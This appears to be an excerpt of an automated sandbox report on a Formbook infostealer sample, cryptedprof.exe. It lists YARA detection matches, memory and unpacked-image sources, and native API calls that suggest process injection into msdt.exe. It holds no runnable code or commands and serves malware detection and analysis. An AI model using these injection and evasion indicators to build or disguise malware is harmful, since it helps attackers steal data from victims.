          Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00419D5A NtCreateFile,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00419DB4 NtReadFile,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00419E8A NtClose,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00419F3C NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AFB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AFA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AFAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9560 NtWriteFile,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046DB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046DAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046DA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046DA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046DA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79E90 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79E10 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79E8A NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79F3C NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79DB4 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79D5A NtCreateFile,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00407272
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00406A9B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_70991A98
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00401027
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041E03E
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041E2A1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041D38B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041D5F1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00409E40
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00409E3B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041DF46
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041CFA6
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE20A0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B820A8
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACB090
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B828EC
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B8E824
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA830
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71002
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD4120
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABF900
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B822AE
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B6FA2B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEEBB0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B623E3
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7DBD2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B703DA
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEABD8
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B82B28
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAB40
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC841F
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7D466
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2581
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACD5E0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B825DD
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB0D20
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B82D07
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B81D55
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B82EF7
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD6E30
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7D616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047620A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AB090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04761D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04690D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469F900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04762D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B6E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04762EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047622AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04762B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04761FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0475DBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CEBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C7E2A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C7D38B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C7E03E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C69E40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C69E3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C7CFA6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C62FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C62D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0469B150 appears 35 times
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: String function: 00ABB150 appears 121 times
          Source: cryptedprof.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: cryptedprof.exe, 00000001.00000003.327029205.0000000002D3F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cryptedprof.exe
          Source: cryptedprof.exe, 00000001.00000002.335855090.00000000028F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs cryptedprof.exe
          Source: cryptedprof.exe, 00000003.00000002.388818719.0000000000D3F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cryptedprof.exe
          Source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs cryptedprof.exe
          Source: cryptedprof.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@3/3
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00404763 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
